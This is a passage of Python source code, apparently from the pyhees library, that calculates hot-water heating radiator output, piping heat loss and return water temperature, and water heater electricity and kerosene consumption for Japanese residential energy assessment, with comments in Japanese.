if rad_list[i - 1] is None:
continue
else:
if rad_list[i - 1] is None:
continue
# 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
A_HCZ = calc_A_HCZ_i(i, A_A, A_MR, A_OR)
R_type = '主たる居室' if i == 1 else 'その他の居室'
mode = mode_MR if i == 1 else mode_OR
Q_max_H_rad_d_t_i = calc_Q_max_H_rad_d_t_i(rad_list[i - 1], A_HCZ, Theta_SW_hs_d_t, region, mode, R_type)
# 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_T_H_rad_d_t_i = calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i, L_T_H_rad[i - 1])
# 1時間当たりの暖冷房区画iに設置された放熱器の温水供給運転率
r_WS_rad_d_t_i = calc_r_WS_rad_d_t_i(
A_HCZ=A_HCZ,
radiator=rad_list[i - 1],
Q_T_H_rad=Q_T_H_rad_d_t_i,
Theta_SW=Theta_SW_hs_d_t,
region=region,
mode=mode,
R_type=R_type
)
Q_dmd_H_ln_d_t[i - 1] = calc_Q_dmd_H_ln_d_t_i(
i=i,
radiator=rad_list[i - 1],
Q_T_H_rad_d_t_i=Q_T_H_rad_d_t_i,
Q_max_H_rad_d_t_i=Q_max_H_rad_d_t_i,
L_T_H_rad_d_t_i=L_T_H_rad[i - 1],
Theta_SW_d_t=Theta_SW_hs_d_t,
Theta_ex=Theta_ex,
r_WS_rad_d_t_i=r_WS_rad_d_t_i,
A_A=A_A,
pipe_insulation=pipe_insulation,
underfloor_pipe_insulation=underfloor_pipe_insulation,
MR_rad_type=MR_rad_type,
r_Af_1=r_Af_1
)
Q_dash_max_H_rad_d_t_i = get_Q_dash_max_H_rad_d_t_i(Q_max_H_rad_d_t_i, Q_dmd_H_ln_d_t[i - 1])
Q_dash_max_H_rad_d_t[i - 1, :] = Q_dash_max_H_rad_d_t_i
# 1時間ごとの対数平均温度差 (9b)
T_dif = get_T_dif_d_t(Q_dmd_H_ln_d_t, Q_dash_max_H_rad_d_t)
# 温水暖房用熱源機の戻り温水温度 (9a)
Theta_RW_hs_d_t = np.zeros(24 * 365)
# - 条件1 (熱源機の往き温水温度60度)
f1 = (Theta_SW_hs_d_t == 60)
Theta_RW_hs_d_t[f1] = 0.0301 * T_dif[f1] ** 2 - 0.1864 * T_dif[f1] + 20
# - 条件2 (熱源機の往き温水温度40度)
f2 = (Theta_SW_hs_d_t == 40)
Theta_RW_hs_d_t[f2] = 0.0604 * T_dif[f2] ** 2 - 0.1881 * T_dif[f2] + 20
# 温水暖房用戻り温度は往き温度を超えない
fover = (Theta_RW_hs_d_t > Theta_SW_hs_d_t) # 温水暖房用戻り温度は往き温度を超えた日時インデックス
Theta_RW_hs_d_t[fover] = Theta_SW_hs_d_t[fover] # 逆転日時の限り、戻り温度=往き温度とする
return Theta_RW_hs_d_t
def get_Q_dash_max_H_rad_d_t_i(Q_max_H_rad_d_t_i, Q_dmd_H_ln_d_t_i):
"""1時間当たりの温水熱需要が発生する場合の暖冷房区画iに設置された放熱器の最大暖房出力 (9c)
Args:
Q_max_H_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
Q_dmd_H_ln_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の放熱系統の温水熱需要
Returns:
ndarray: 1時間当たりの温水熱需要が発生する場合の暖冷房区画iに設置された放熱器の最大暖房出力 (9c)
"""
Q_dash_max_H_rad_d_t_i = np.copy(Q_max_H_rad_d_t_i)
Q_dash_max_H_rad_d_t_i[Q_dmd_H_ln_d_t_i == 0] = 0
return Q_dash_max_H_rad_d_t_i
def get_T_dif_d_t(Q_dmd_H_ln_d_t, Q_dash_max_H_rad_d_t):
"""1時間ごとの対数平均温度差 (9b)
Args:
Q_dmd_H_ln_d_t(ndarray): 1時間当たりの放熱系統の温水熱需要
Q_dash_max_H_rad_d_t(ndarray): 1時間当たりの放熱器の最大暖房出力
Returns:
ndarray: 1時間ごとの対数平均温度差 (9b)
"""
Q_dmd = np.sum(Q_dmd_H_ln_d_t, axis=0)
Q_dash_max = np.sum(Q_dash_max_H_rad_d_t, axis=0)
T_dif_d_t = np.zeros(24 * 365)
f = (Q_dmd > 0)
T_dif_d_t[f] = Q_dmd[f] / (Q_dash_max[f] * 0.027583)
return T_dif_d_t
# ============================================================================
# 8. 放熱系統
# ============================================================================
# ============================================================================
# 8.1 温水熱需要
# ============================================================================
def calc_Q_dmd_H_ln_d_t_i(i, radiator, Q_T_H_rad_d_t_i, Q_max_H_rad_d_t_i, L_T_H_rad_d_t_i, Theta_SW_d_t, Theta_ex,
r_WS_rad_d_t_i, A_A, pipe_insulation, underfloor_pipe_insulation,
MR_rad_type, r_Af_1):
"""1時間当たりの放熱系統iの温水熱需要 (10)
Args:
i(int): 暖冷房区画i
radiator(dict): 放熱器仕様
Q_T_H_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_max_H_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
L_T_H_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の暖房負荷
Theta_SW_d_t(ndarray): 往き温水温度 (℃)
Theta_ex(ndarray): 外気絶対温度[K]
r_WS_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された温水床暖房の温水供給運転率
A_A(float): 床面積の合計 (m2)
pipe_insulation(bool): 配管断熱の有無
underfloor_pipe_insulation(bool): 床下配管断熱の有無
MR_rad_type(str): 主たる居室の放熱器の種類
r_Af_1(float): 当該住戸における温水床暖房の敷設率 (-)
Returns:
ndarray: 1時間当たりの放熱系統iの温水熱需要 (10)
"""
# 1時間当たりの暖冷房区画iに設置された放熱器の温水熱需要
Q_dmd_H_rad_d_t_i = calc_Q_dmd_H_rad_d_t_i(radiator, Q_max_H_rad_d_t_i, L_T_H_rad_d_t_i)
# 1時間当たりの配管iの熱損失
Q_loss_pp_d_t_i = calc_Q_loss_pp_d_t_i(
i=i,
Theta_SW_d_t=Theta_SW_d_t,
Theta_ex_d_t=Theta_ex,
r_WS_rad_d_t_i=r_WS_rad_d_t_i,
A_A=A_A,
pipe_insulation=pipe_insulation,
underfloor_pipe_insulation=underfloor_pipe_insulation,
MR_rad_type=MR_rad_type,
r_Af_1=r_Af_1
)
return Q_dmd_H_rad_d_t_i + Q_loss_pp_d_t_i
# ============================================================================
# 8.2 温水供給運転率
# ============================================================================
def calc_r_WS_ln_d_t_i(A_HCZ, radiator, Q_T_H_rad, Theta_SW, region, mode, R_type):
"""放熱系統iの温水供給運転率 (11)
Args:
A_HCZ(float): 暖冷房区画の床面積
radiator(dict): 放熱器仕様
Q_T_H_rad(ndarray): 放熱器の処理暖房負荷
Theta_SW(ndarray): 往き温水温度 (℃)
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
R_type(string): 居室の形式
Returns:
tuple: 放熱系統iの温水供給運転率 (11)
"""
return calc_r_WS_rad_d_t_i(A_HCZ, radiator, Q_T_H_rad, Theta_SW, region, mode, R_type)
# ============================================================================
# 8.3 要求往き温水温度の区分
# ============================================================================
def calc_p_ln_d_t_i(radiator, L_T_H_rad_d_t_i, Theta_SW_hs_op, A_HCZ, region, mode, R_type):
"""放熱系統の要求往き温水温度の区分
Args:
radiator(dict): 放熱器仕様
L_T_H_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の暖房負荷
Theta_SW_hs_op(tuple): 温水暖房用熱源機の往き温水温度の候補
A_HCZ(float): 暖冷房区画の床面積
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
R_type(string): 居室の形式
Returns:
float: 放熱系統の要求往き温水温度の区分
"""
n = len(Theta_SW_hs_op)
if n == 1:
# 候補が1つの場合は決定
return np.ones(24 * 365)
else:
# 候補が2つ以上の場合は未処理負荷の発生状況を確認
# 放熱器がない暖房区画が指定されて場合は便宜上、最低の温水温度の区分を返す
if radiator is None:
return n * np.ones(24 * 365)
# 往き温水温度の候補ごとに未処理負荷の発生状況を確認する
# このとき、最大の往き温水温度の候補(p=1)は確認をしない
flag_UT_d_t_p = np.ones((n - 1, 24 * 365)) # 基本はp=1
for p in range(2, n + 1):
# 往き温水温度の候補p
Theta_SW = Theta_SW_hs_op[p - 1]
# 往き温水温度の候補pにおける放熱器の最大出力
Q_max_H_rad_d_t_i_p = calc_Q_max_H_rad_d_t_i(radiator, A_HCZ, Theta_SW, region, mode, R_type)
# 往き温水温度の候補pにおける1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_T_H_rad_d_t_i_p = calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i_p, L_T_H_rad_d_t_i)
# 往き温水温度の候補pにおける1時間当たりの暖冷房区画iに設置された放熱器の未処理暖房負荷
Q_UT_H_rad_d_t_i_p = L_T_H_rad_d_t_i - Q_T_H_rad_d_t_i_p
# 未処理負荷が発生しなかった時刻にはpを保存
flag_UT_d_t_i_p = Q_UT_H_rad_d_t_i_p <= 0.0
flag_UT_d_t_p[p - 2][flag_UT_d_t_i_p] = p
# 1時間当たりの往き温水温度の候補p
p_ln_d_t_i = np.max(flag_UT_d_t_p, axis=0)
return p_ln_d_t_i
# ===========================================================================
# 9. 配管
# ============================================================================
def calc_Q_loss_pp_d_t_i(i, Theta_SW_d_t, Theta_ex_d_t, r_WS_rad_d_t_i, A_A, pipe_insulation, underfloor_pipe_insulation,
MR_rad_type, r_Af_1):
"""1時間当たりの配管iの熱損失 (12)
Args:
i(int): 暖冷房区画の番号
Theta_SW_d_t(ndarray): 往き温水温度 (℃)
Theta_ex_d_t(ndarray): 外気温度(℃)
r_WS_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された温水床暖房の温水供給運転率
A_A(float): 床面積の合計 (m2)
pipe_insulation(bool): 配管断熱の有無
underfloor_pipe_insulation(bool): 床下配管断熱の有無
MR_rad_type(str): 主たる居室の放熱器の種類
r_Af_1(float): 当該住戸における温水床暖房の敷設率 (-)
Returns:
ndarray: 1時間当たりの配管iの熱損失 (12)
"""
# 配管の断熱区画外における長さ
L_pp_ex_i = pipe.calc_L_pp_ex_i(i, A_A, underfloor_pipe_insulation, MR_rad_type, r_Af_1)
# 配管の断熱区画内における長さ
L_pp_in_i = pipe.calc_L_pp_in_i(i, A_A, underfloor_pipe_insulation, MR_rad_type, r_Af_1)
# 線熱損失係数
K_loss_pp_i = pipe.get_K_loss_pp(pipe_insulation)
return ((Theta_SW_d_t - (Theta_ex_d_t * 0.7 + 20 * 0.3)) * L_pp_ex_i + (Theta_SW_d_t - 20) * L_pp_in_i) \
* K_loss_pp_i * r_WS_rad_d_t_i * 3600 * 10 ** (-6)
# ***************************************************************************
# 10. 放熱器
# ***************************************************************************
# ============================================================================
# 10.1 供給熱量
# ============================================================================
def calc_Q_dmd_H_rad_d_t_i(radiator, Q_max_H_rad_d_t_i, L_T_H_rad_d_t_i):
"""1時間当たりの暖冷房区画iに設置された放熱器の温水熱需要 (13)
Args:
radiator(dict): 放熱器仕様
Q_max_H_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
L_T_H_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の暖房負荷
Returns:
ndarray: 1時間当たりの暖冷房区画iに設置された放熱器の温水熱需要
"""
# 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_T_H_rad_d_t_i = calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i, L_T_H_rad_d_t_i)
# 1時間当たりの暖冷房区画iに設置された放熱器の熱損失
Q_loss_rad_d_t_i = calc_Q_loss_rad_d_t_i(radiator, Q_T_H_rad_d_t_i)
return Q_T_H_rad_d_t_i + Q_loss_rad_d_t_i
# ============================================================================
# 10.2 消費電力量
# ============================================================================
def calc_E_E_rad_d_t_i(i, radiator, Q_T_H_rad, Theta_SW, A_A, A_MR, A_OR, region, mode, R_type):
"""1時間当たりの暖冷房区画iに設置された放熱器の消費電力量
Args:
i(int): 暖冷房区画の番号
radiator(dict): 放熱器仕様
Q_T_H_rad(ndarray): 放熱器の処理暖房負荷
Theta_SW(ndarray): 往き温水温度 (℃)
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
R_type(string): 居室の形式
Returns:
ndarray: 1時間当たりの暖冷房区画iに設置された放熱器の消費電力量
"""
if radiator['type'] == '温水暖房用パネルラジエーター' or radiator['type'] == '温水暖房用床暖房':
return np.zeros(24 * 365)
elif radiator['type'] == '温水暖房用ファンコンベクター':
A_HCZ = calc_A_HCZ_i(i, A_A, A_MR, A_OR)
return rad_fanc.calc_E_E_rad(
A_HCZ=A_HCZ,
region=region,
mode=mode,
R_type=R_type,
Theta_SW=Theta_SW,
Q_T_H_rad=Q_T_H_rad,
)
else:
raise ValueError(radiator['type'])
def calc_A_HCZ_i(i, A_A, A_MR, A_OR):
"""暖冷房区画iの床面積
Args:
i(int): 暖冷房区画の番号
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
Returns:
float: 暖冷房区画iの床面積
"""
return ld.get_A_HCZ_i(i, A_A, A_MR, A_OR)
# ============================================================================
# 10.3 熱損失
# ============================================================================
def calc_Q_loss_rad_d_t_i(radiator, Q_T_H_rad):
"""1時間当たりの暖冷房区画iに設置された放熱器の熱損失
Args:
radiator(dict): 放熱器仕様
Q_T_H_rad(ndarray): 放熱器の処理暖房負荷
Returns:
ndarray: 1時間当たりの暖冷房区画iに設置された放熱器の熱損失
"""
if radiator['type'] == '温水暖房用パネルラジエーター' or radiator['type'] == '温水暖房用ファンコンベクター':
return np.zeros_like(Q_T_H_rad)
elif radiator['type'] == '温水暖房用床暖房':
return rad_floor.get_Q_loss_rad(
r_up=radiator['r_up'],
Q_T_H_rad=Q_T_H_rad
)
else:
raise ValueError(radiator['type'])
# ============================================================================
# 10.4 温水供給運転率
# ============================================================================
def calc_r_WS_rad_d_t_i(A_HCZ, radiator, Q_T_H_rad, Theta_SW, region, mode, R_type):
"""放熱器の温水供給運転率
Args:
A_HCZ(float): 暖冷房区画の床面積
radiator(dict): 放熱器仕様
Q_T_H_rad(ndarray): 放熱器の処理暖房負荷
Theta_SW(ndarray): 往き温水温度 (℃)
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
R_type(string): 居室の形式
Returns:
ndarray: 放熱器の温水供給運転率
"""
if radiator['type'] == '温水暖房用パネルラジエーター':
# 温水供給運転率の計算
r_WS_rad_d_t_i = rad_panel.calc_r_WS_rad(
region=region,
mode=mode,
A_HCZ=A_HCZ,
R_type=R_type,
Theta_SW=Theta_SW,
Q_T_H_rad=Q_T_H_rad
)
elif radiator['type'] == '温水暖房用ファンコンベクター':
# 仕様の取得
q_max_FC = rad_fanc.calc_q_max_FC(region, mode, A_HCZ, R_type)
q_min_FC = rad_fanc.get_q_min_FC(q_max_FC)
Q_min_H_FC = rad_fanc.get_Q_min_H_FC(Theta_SW, q_min_FC)
# 温水供給運転率の計算
r_WS_rad_d_t_i = rad_fanc.get_r_WS_rad(
Q_min_H_FC=Q_min_H_FC,
Q_T_H_rad=Q_T_H_rad
)
elif radiator['type'] == '温水暖房用床暖房':
# 仕様の取得
A_f = rad_floor.get_A_f(A_HCZ, radiator['r_Af'])
Q_max_H_rad = rad_floor.get_Q_max_H_rad(Theta_SW, A_f)
# 温水供給運転率の計算
r_WS_rad_d_t_i = rad_floor.get_r_WS_rad(
Q_T_H_rad=Q_T_H_rad,
Q_max_H_rad=Q_max_H_rad
)
else:
raise ValueError(radiator['type'])
# 温水供給運転率が1を超える場合は1、0を下回る場合は0
r_WS_rad_d_t_i = np.clip(r_WS_rad_d_t_i, 0, 1)
return r_WS_rad_d_t_i
# ============================================================================
# 10.5 処理暖房負荷
# ============================================================================
def calc_Q_T_H_rad_d_t_i(Q_max_H_d_t_i, L_H_d_t_i):
"""1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Args:
Q_max_H_d_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの1時間当たりの暖冷房区画𝑖に設置された放熱器の最大暖房出力
L_H_d_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの1時間当たりの暖房負荷(MJ/h)
Returns:
ndarray: 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
"""
import pyhees.section4_1_Q
return pyhees.section4_1_Q.get_Q_T_H_d_t_i(Q_max_H_d_t_i, L_H_d_t_i)
# ============================================================================
# 10.6 最大暖房出力
# ============================================================================
def calc_Q_max_H_rad_d_t_i(radiator, A_HCZ, Theta_SW, region, mode, R_type):
"""放熱器の最大暖房出力
Args:
radiator(dict): 放熱器仕様
A_HCZ(float): 暖冷房区画の床面積
Theta_SW(ndarray): 往き温水温度 (℃)
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
R_type(string): 居室の形式
Returns:
ndarray: 放熱器の最大暖房出力
"""
if radiator['type'] == '温水暖房用パネルラジエーター':
# 仕様の取得
q_max_rad = rad_panel.calc_q_max_rad(region, mode, A_HCZ, R_type)
# 最大暖房出力の計算
return rad_panel.get_Q_max_H_rad(
q_max_rad=q_max_rad,
Theta_SW=Theta_SW
)
elif radiator['type'] == '温水暖房用ファンコンベクター':
# 仕様の取得
q_max_FC = rad_fanc.calc_q_max_FC(region, mode, A_HCZ, R_type)
# 最大暖房出力の計算
return rad_fanc.calc_Q_max_H_rad(
q_max_FC=q_max_FC,
Theta_SW=Theta_SW
)
elif radiator['type'] == '温水暖房用床暖房':
# 仕様の取得
A_f = rad_floor.get_A_f(A_HCZ, radiator['r_Af'])
# 最大暖房出力の計算
return rad_floor.get_Q_max_H_rad(
A_f=A_f,
Theta_SW=Theta_SW
)
else:
raise ValueError(radiator['type'])
```
#### File: src/pyhees/section7_1_d.py
```python
import numpy as np
# ============================================================================
# D.2 消費電力量
# ============================================================================
def calc_E_E_hs_d_t(W_dash_k_d_t, W_dash_s_d_t, W_dash_w_d_t, W_dash_b1_d_t, W_dash_ba1_d_t, W_dash_b2_d_t,
theta_ex_d_Ave_d, L_dashdash_ba2_d_t):
"""1時間当たりの給湯機の消費電力量 (1)
Args:
W_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯量 (L/h)
W_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯量 (L/h)
W_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯量 (L/h)
W_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/h)
W_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯量 (L/h)
W_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯量 (L/h)
theta_ex_d_Ave_d: 日平均外気温度 (℃)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの給湯機の消費電力量 (kWh/h)
"""
# 待機時及び水栓給湯時の補機による消費電力量 (2)
E_E_hs_aux1_d_t = get_E_E_hs_aux1_d_t(W_dash_k_d_t, W_dash_s_d_t, W_dash_w_d_t, W_dash_b1_d_t, W_dash_ba1_d_t,
theta_ex_d_Ave_d)
# 湯はり時の補機による消費電力量 (3)
E_E_hs_aux2_d_t = calc_E_E_hs_aux2_d_t(W_dash_b2_d_t)
# 保温時の補機による消費電力量 (4)
E_E_hs_aux3_d_t = calc_E_E_hs_aux3_d_t(L_dashdash_ba2_d_t)
# 1日当たりの給湯機の消費電力量 (1)
E_E_hs_d_t = E_E_hs_aux1_d_t + E_E_hs_aux2_d_t + E_E_hs_aux3_d_t
return E_E_hs_d_t
def get_E_E_hs_aux1_d_t(W_dash_k_d_t, W_dash_s_d_t, W_dash_w_d_t, W_dash_b1_d_t, W_dash_ba1_d_t, theta_ex_d_Ave_d):
"""1時間当たりの給湯機の待機時及び水栓給湯時の補機による消費電力量 (2)
Args:
W_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯量 (L/h)
W_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯量 (L/h)
W_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯量 (L/h)
W_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/h)
W_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯量 (L/h)
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
Returns:
ndarray: 1時間当たりの給湯機の待機時及び水栓給湯時の補機による消費電力量 (kWh/h)
"""
# 1時間当たりの給湯機の待機時及び水栓給湯時の補機による消費電力量 (2)
E_E_hs_aux1_d_t = ((-0.00235 * np.repeat(theta_ex_d_Ave_d, 24) + 0.3388) / 24
+ 0.000780 * (
W_dash_k_d_t + W_dash_s_d_t + W_dash_w_d_t + W_dash_b1_d_t + W_dash_ba1_d_t)) * 10 ** 3 / 3600
return E_E_hs_aux1_d_t
def calc_E_E_hs_aux2_d_t(W_dash_b2_d_t):
"""1時間当たりの給湯機の湯はり時の補機による消費電力量 (3)
Args:
W_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯量 (L/h)
Returns:
ndarray: 1時間当たりの給湯機の湯はり時の補機による消費電力量 (kWh/h)
"""
E_E_hs_aux2_d_t = np.zeros(24 * 365)
# 1日ごとにまとめる
W_dash_b2_d = get_W_dash_b2_d(W_dash_b2_d_t)
W_dash_b2_d = np.repeat(W_dash_b2_d, 24)
# W_dash_b2_d > 0 の場合
f = W_dash_b2_d > 0
E_E_hs_aux2_d_t[f] = (0.07 * 10 ** 3 / 3600) * W_dash_b2_d_t[f] / W_dash_b2_d[f]
return E_E_hs_aux2_d_t
def calc_E_E_hs_aux3_d_t(L_dashdash_ba2_d_t):
"""1時間当たりの給湯機の保温時の補機による消費電力量 (4)
Args:
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 1日当たりの給湯機の保温時の補機による消費電力量 (kWh/d)
"""
E_E_hs_aux3 = np.zeros(24 * 365)
L_dashdash_ba2_d = get_L_dashdash_ba2_d(L_dashdash_ba2_d_t)
L_dashdash_ba2_d = np.repeat(L_dashdash_ba2_d, 24)
f = (L_dashdash_ba2_d > 0)
E_E_hs_aux3[f] = (0.02102 * L_dashdash_ba2_d[f] + 0.12852) * 10 ** 3 / 3600 \
* L_dashdash_ba2_d_t[f] / L_dashdash_ba2_d[f]
return E_E_hs_aux3
# ============================================================================
# D.3 ガス消費量
# ============================================================================
def get_E_G_hs_d_t():
"""1日当たりの給湯機のガス消費量
Args:
Returns:
ndarray: 1日当たりの給湯機のガス消費量
"""
# 1日当たりの給湯機のガス消費量は0とする
return np.zeros(24 * 365)
# ============================================================================
# D.4 灯油消費量
# ============================================================================
def calc_E_K_hs_d_t(hw_type, e_rtd, e_dash_rtd, bath_function, theta_ex_d_Ave_d, L_dashdash_k_d_t, L_dashdash_s_d_t, L_dashdash_w_d_t,
L_dashdash_b1_d_t, L_dashdash_b2_d_t, L_dashdash_ba1_d_t, L_dashdash_ba2_d_t):
"""灯油消費量 (5)
Args:
hw_type(str): 給湯機/給湯温水暖房機の種類
e_rtd(float): 当該給湯機の効率
e_dash_rtd(float): エネルギーの使用の合理化に関する法律」に基づく「特定機器の性能の向上に関する製造事業者等の 判断の基準等」(ガス温水機器)に定義される「エネルギー消費効率」
bath_function(str): ふろ機能の種類
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯熱負荷 (MJ/h)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯熱負荷 (MJ/h)
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの給湯機の灯油消費量 (MJ/h)
"""
# 効率の決定
if e_rtd == None:
if e_dash_rtd == None:
e_rtd = get_e_rtd_default(hw_type)
else:
e_rtd = get_e_rtd(e_dash_rtd)
# 1日当たりの太陽熱補正給湯熱負荷
L_dashdash_k_d = get_L_dashdash_k_d(L_dashdash_k_d_t)
L_dashdash_s_d = get_L_dashdash_s_d(L_dashdash_s_d_t)
L_dashdash_w_d = get_L_dashdash_w_d(L_dashdash_w_d_t)
L_dashdash_b1_d = get_L_dashdash_b1_d(L_dashdash_b1_d_t)
L_dashdash_b2_d = get_L_dashdash_b2_d(L_dashdash_b2_d_t)
L_dashdash_ba1_d = get_L_dashdash_ba1_d(L_dashdash_ba1_d_t)
L_dashdash_ba2_d = get_L_dashdash_ba2_d(L_dashdash_ba2_d_t)
# 日平均給湯機効率
e_k_d = get_e_k_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_k_d, L_dashdash_w_d)
e_s_d = get_e_s_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_s_d)
e_w_d = get_e_w_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_k_d, L_dashdash_w_d)
e_b1_d = get_e_b1_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_b1_d)
e_b2_d = get_e_b2_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_b2_d)
e_ba1_d = get_e_ba1_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_ba1_d)
e_ba2_d = get_e_ba2_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_ba2_d)
e_k_d = np.repeat(e_k_d, 24)
e_s_d = np.repeat(e_s_d, 24)
e_w_d = np.repeat(e_w_d, 24)
e_b1_d = np.repeat(e_b1_d, 24)
e_b2_d = np.repeat(e_b2_d, 24)
e_ba1_d = np.repeat(e_ba1_d, 24)
e_ba2_d = np.repeat(e_ba2_d, 24)
if bath_function == '給湯単機能':
# (5a)
return L_dashdash_k_d_t / e_k_d \
+ L_dashdash_s_d_t / e_s_d \
+ L_dashdash_w_d_t / e_w_d \
+ L_dashdash_b1_d_t / e_b1_d \
+ L_dashdash_ba1_d_t / e_ba1_d
elif bath_function == 'ふろ給湯機(追焚なし)':
# (5b)
return L_dashdash_k_d_t / e_k_d \
+ L_dashdash_s_d_t / e_s_d \
+ L_dashdash_w_d_t / e_w_d \
+ L_dashdash_b2_d_t / e_b2_d \
+ L_dashdash_ba1_d_t / e_ba1_d
elif bath_function == 'ふろ給湯機(追焚あり)':
# (5c)
return L_dashdash_k_d_t / e_k_d \
+ L_dashdash_s_d_t / e_s_d \
+ L_dashdash_w_d_t / e_w_d \
+ L_dashdash_b2_d_t / e_b2_d \
+ L_dashdash_ba2_d_t / e_ba2_d
else:
raise ValueError(bath_function)
def get_e_k_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_k_d, L_dashdash_w_d):
"""台所水栓の給湯使用時における日平均給湯機効率 (6a)
Args:
e_rtd(float): 当該給湯機の効率
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d(ndarray): 1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_w_d(ndarray): 1日当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 台所水栓の給湯使用時における日平均給湯機効率
"""
# 当該給湯機に対する効率の補正係数
f_hs = get_f_hs(e_rtd)
# 石油給湯機効率の回帰係数
a_std_k = get_table_d_3()[0][0]
b_std_k = get_table_d_3()[1][0]
c_std_k = get_table_d_3()[2][0]
a_k = a_std_k * f_hs # (7a)
b_k = b_std_k * f_hs # (7b)
c_k = c_std_k * f_hs # (7c)
e_k = a_k * theta_ex_d_Ave_d + b_k * (L_dashdash_k_d + L_dashdash_w_d) + c_k
return np.clip(e_k, 0.0, 1.0)
def get_e_s_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_s_d):
"""浴室シャワー水栓の給湯使用時における日平均給湯機効率 (6b)
Args:
e_rtd(float): 当該給湯機の効率
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_s_d(ndarray): 1日当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 浴室シャワー水栓における日平均給湯機効率
"""
# 当該給湯機に対する効率の補正係数
f_hs = get_f_hs(e_rtd)
# 石油給湯機効率の回帰係数
a_std_s = get_table_d_3()[0][1]
b_std_s = get_table_d_3()[1][1]
c_std_s = get_table_d_3()[2][1]
a_s = a_std_s * f_hs # (7a)
b_s = b_std_s * f_hs # (7b)
c_s = c_std_s * f_hs # (7c)
e_s = a_s * theta_ex_d_Ave_d + b_s * L_dashdash_s_d + c_s
return np.clip(e_s, 0.0, 1.0)
def get_e_w_d(e_rtd, theta_ex_d_Ave_d, L_dashdash_k_d, L_dashdash_w_d):
"""洗面水栓の給湯使用時における日平均給湯機効率 (6c)
Args:
